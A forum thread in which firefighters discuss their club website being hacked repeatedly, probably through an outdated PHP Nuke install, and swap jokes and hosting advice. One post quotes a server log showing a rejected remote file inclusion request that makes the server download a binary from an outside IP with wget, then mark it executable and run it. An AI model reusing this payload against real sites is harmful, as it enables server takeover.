1. #1
    Forum Member
    DeputyChiefGonzo's Avatar
    Join Date
    Aug 2000
    Location
    Somewhere between genius and insanity!
    Posts
    13,584

    Angry IACOJ hacked again.

    For the third time in two weeks, some fracking hackers have hacked into the IACOJ website. :mad

    Who wants to go to Turkey and hunt these mutts down with me?
    ‎"The education of a firefighter and the continued education of a firefighter is what makes "real" firefighters. Continuous skill development is the core of progressive firefighting. We learn by doing and doing it again and again, both on the training ground and the fireground."
    Lt. Ray McCormack, FDNY

  2. #2
    Forum Member
    fireguy919's Avatar
    Join Date
    Mar 2005
    Location
    eastern Ohio
    Posts
    952

    Default

    Im in Cap. Lets go hunting!!!!!
    Training does not make perfect. Training makes permanent!

    IACOJ probie

  3. #3
    MembersZone Subscriber
    RoughRider's Avatar
    Join Date
    Mar 2005
    Location
    Oyster Bay, NY
    Posts
    798

    Default I'm In Capt !!

    Lets get em!!


    RR
    Fortune does not change men; it unmasks them.

    The grass ain't greener, the wine ain't sweeter!! Either side of the hill.


    IACOJ PROUD

  4. #4
    Forum Member
    spearsm's Avatar
    Join Date
    Mar 2004
    Location
    Lowndes, MS USA
    Posts
    742

    Default

    What is it going to take to end this crap?
    YGBSM!
    Eagles may soar, but weasels don't get sucked into jet engines.

    If all you have is a hammer, then your problems start to look like nails.
    ___________________

    IACOJ
    Southern Division.

  5. #5
    Forum Member
    Lewiston2FF's Avatar
    Join Date
    Mar 2000
    Location
    Niagara Falls, NY, USA
    Posts
    1,924

    Default

    I'm in!
    Are they just arbitrarily picking the IACOJ site or are they targeting it for a particular reason?
    Shawn M. Cecula
    Firefighter
    IACOJ Division of Fire and EMS

  6. #6
    Forum Member

    Join Date
    Oct 2005
    Posts
    1,154

    Default

    Almost certainly it's just random.

    They're almost certainly using some scanning software looking for sites with vulnerable versions of PHP Nuke. Good chance the hack itself is fully automated.

    I would *think* the version of PHP Nuke and patching it would be the responsibility of the company that hosts IACOJ.

  7. #7
    Forum Member
    Bones42's Avatar
    Join Date
    Mar 2001
    Location
    Pt. Beach, NJ
    Posts
    10,686

    Default

    or is it a consortium of firehouse.com users who's IACOJ membership was denied?

    an attack from our own (FF's)?

    (images of TH, Cdevoe, etc sitting in a dark cellar running through my mind)
    "This thread is being closed as it is off-topic and not related to the fire industry." - Isn't that what the Off Duty forum was for?

  8. #8
    MembersZone Subscriber
    cdemarse's Avatar
    Join Date
    Jan 2005
    Location
    Illinois
    Posts
    493

    Default

    I told you trojan horse would get his revenge
    "Train as if your life depends on it"
    Always Remember *343*

  9. #9
    MembersZone Subscriber

    Join Date
    May 2003
    Location
    Upstate NY
    Posts
    487

    Default

    Hey Cap,

    I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?

  10. #10
    MembersZone Subscriber

    Join Date
    Nov 2001
    Posts
    2,983

    Talking

    Quote Originally Posted by CaptainS
    Hey Cap,

    I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?

    I'll provide the food.

  11. #11
    Forum Member
    Dave1983's Avatar
    Join Date
    Oct 2003
    Location
    Gator Country
    Posts
    4,157

    Default

    Quote Originally Posted by cdemarse
    I told you trojan horse would get his revenge
    Well, since he is a 1% er, Im sure he could figure out how to do it.
    Fire Marshal/Safety Officer

    IAAI-NFPA-IAFC/VCOS-Retired IAFF

    "No his mind is not for rent, to any god or government"
    RUSH-Tom Sawyer

    Success is when skill meets opportunity
    Failure is when fantasy meets reality

  12. #12
    Forum Member
    medicmaster's Avatar
    Join Date
    Sep 2005
    Location
    Central Iowa
    Posts
    379

    Default

    Quote Originally Posted by cdemarse
    I told you trojan horse would get his revenge
    I always assumed he was a virus anyways....remember the trojanhorse virus a few years ago...maybe he really is a hacker in disguise.
    Jack of all trades, master of none.

    Live Green, Go Yellow!

    Join the forums at www.ambulass.com!

  13. #13
    IACOJ BOD
    FlyingKiwi's Avatar
    Join Date
    May 2002
    Location
    New Zealand
    Posts
    4,757

    Default

    A sample of our Internet site log file. A PHP attach recorded and rejected

    from IP Address 80.55.45.106
    on Port 80

    GET /index2.php option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1

    The first IP address the attack was from is out of Poland.

    The URL http://213.97.113.25/cmd.gif is from Spain, Don't try it it is BS.

    The object is to use a vulnerability in PHP to gain access as an Admin user to any PHP site.

    Hackers set up to send a series of commands to any IP address they can PING a response from, once the appropriate responses to an attack are recieved and recorded, they can go back to the sites and "take over".
    Psychiatrists state 1 in 4 people has a mental illness.
    Look at three of your friends, if they are ok, your it.

  14. #14
    MembersZone Subscriber

    Join Date
    Feb 2005
    Location
    Denver
    Posts
    55

    Default

    As a security engineer with experience patching and keeping phpbb sites secure, I'd be happy to help you guys out if you need it. Just shoot me a PM on here.

  15. #15
    Permanently Removed
    CALFFBOU's Avatar
    Join Date
    Sep 2002
    Location
    CA
    Posts
    6,520

    Default

    Sorry guys...it was me. I was just trying to get some money out of my ATM and hit the wrong PIN.

    It shouldnt happen again...Bou

  16. #16
    MembersZone Subscriber
    pvfire424's Avatar
    Join Date
    Feb 2004
    Location
    Kansas City Mo
    Posts
    667

    Default

    SHENANIGANS !!!!




    Oh crud, I forgot my torch.
    I.A.C.O.J. "The Cork"

  17. #17
    MembersZone Subscriber
    MattyS's Avatar
    Join Date
    Jan 2006
    Location
    home of the 12th man
    Posts
    158

    Default

    rubber strikes again..
    The good thing about this job is that we have done so much, with so little, for so long that we can do everything with nothing...... which is what is wrong with this job.
    KTF | DTRT

  18. #18
    Forum Member
    Smoke20286's Avatar
    Join Date
    Dec 2002
    Posts
    873

    Default

    Sorry guys, its gotta be hurting your daily hits, to be honest I haven't visited since the last hijack
    A'int No Rocket Scientist's in The Firehall

  19. #19
    MembersZone Subscriber
    ChiefReason's Avatar
    Join Date
    Feb 2001
    Location
    Illinois-where pertnear is close enough!
    Posts
    5,636

    Default

    They don't have to hack.
    They need to fill out an application.
    If they want to get in that bad.
    Do hackers get hacked?
    CR
    Visit www.iacoj.com
    Remember Bradley Golden (9/25/01)
    RIP HOF Robert J. Compton(ENG6511)

  20. #20
    Forum Member

    Join Date
    Oct 2005
    Posts
    1,154

    Default

    Only when we catch them.

  21. #21
    Forum Member

    Join Date
    May 2005
    Posts
    496

    Default

    Quote Originally Posted by CaptainGonzo
    For the third time in two weeks, some fracking hackers have hacked into the IACOJ website. :mad

    Who wants to go to Turkey and hunt these mutts down with me?
    I worked many years in the hosting and web design business - still do part time.

    I would either:

    a: get a new hosting provider(providing they are the weak area)

    b: ask your hosting comany to install all the latest security patches

    c: see if PHPnuker has a patch or fix

    d: ditch PHP nuke

    Dreamweaver has a template feature that works great. This allows you to make changes to mutiple pages over over the entire site.
    Warm Regards,
    Shawn Stoner
    EMT-B

  22. #22
    Dispatch Dweller
    Jay911's Avatar
    Join Date
    Sep 1999
    Location
    On the way to the station. Really. It's 12 kilometers away and there's traffic.
    Posts
    339

    Default

    Was it the "Turkish Hacker's Group"?

    They screwed up my (RMES's) site last month.

    Took me about 90 minutes to fix ... make sure you search EVERY directory/folder on your webserver for index pages. If it has an index.* it gets eaten. Every directory also gets a trio of files containing the same HTML code - I forget exactly what its name is, but I think it's "avb" (.htm, .php, etc).

    RMES's website runs a message board using phpBB2. I don't know if that was the root of the problem, but my hosting provider (ReadyHosting) says it was a fault on their end and has been fixed.

    Haven't seen the Turks again/since.
    --jay.

  23. #23
    Forum Member
    DeputyChiefGonzo's Avatar
    Join Date
    Aug 2000
    Location
    Somewhere between genius and insanity!
    Posts
    13,584

    Default

    Quote Originally Posted by Jay911
    Was it the "Turkish Hacker's Group"?
    As a matter of fact, it was.

    hfd66truck and Steamer take care of the site, if I tried, I would probably shut down the entire internet.
    ‎"The education of a firefighter and the continued education of a firefighter is what makes "real" firefighters. Continuous skill development is the core of progressive firefighting. We learn by doing and doing it again and again, both on the training ground and the fireground."
    Lt. Ray McCormack, FDNY

  24. #24
    Forum Member
    MIKEYLIKESIT's Avatar
    Join Date
    Nov 2001
    Location
    Division 24
    Posts
    4,360

    Default Once again

    I think it is pathetic how some people get off on being jerks.
    IAFF-IACOJ PROUD

  25. #25
    Forum Member
    Res343cue's Avatar
    Join Date
    Jan 2005
    Location
    Your 1st due.
    Posts
    1,651

    Default

    Quote Originally Posted by MIKEYLIKESIT
    I think it is pathetic how some people get off on being jerks.
    Atleast this time, it's a smple fix... Just deleting a news entry, renaming one forum section, and that should be it.
    Quote Originally Posted by ThNozzleMan
    Why? Because we are firemen. We are decent human beings. We would be compelled by the overwhelming impulse to save an innocent child from a tragic, painful death because in the end, we are MEN.

    I A C O J
    FTM-PTB


    Honorary Disclaimer: While I am a manufacturer representative, I am not here to sell my product. Any advice or knowledge shared is for informational purposes only. I do not use Firehouse.Com for promotional purposes.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. IACOJ Website
    By Rayr49 in forum Computers, the 'Net & Us
    Replies: 5
    Last Post: 06-19-2004, 10:36 PM
  2. Attention IACOJ Members
    By ChiefReason in forum The Off Duty Forums
    Replies: 54
    Last Post: 01-27-2004, 06:50 AM
  3. iacoj member needs some help please
    By mtnfyre21 in forum The Off Duty Forums
    Replies: 0
    Last Post: 12-15-2002, 09:42 PM
  4. IACOJ meeting nights.
    By E229Lt in forum The Off Duty Forums
    Replies: 40
    Last Post: 09-07-2002, 09:33 PM
  5. The Authoritative List of the IACOJ
    By Adze39 in forum The Off Duty Forums
    Replies: 14
    Last Post: 08-07-2002, 12:38 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Log in

Click here to log in or register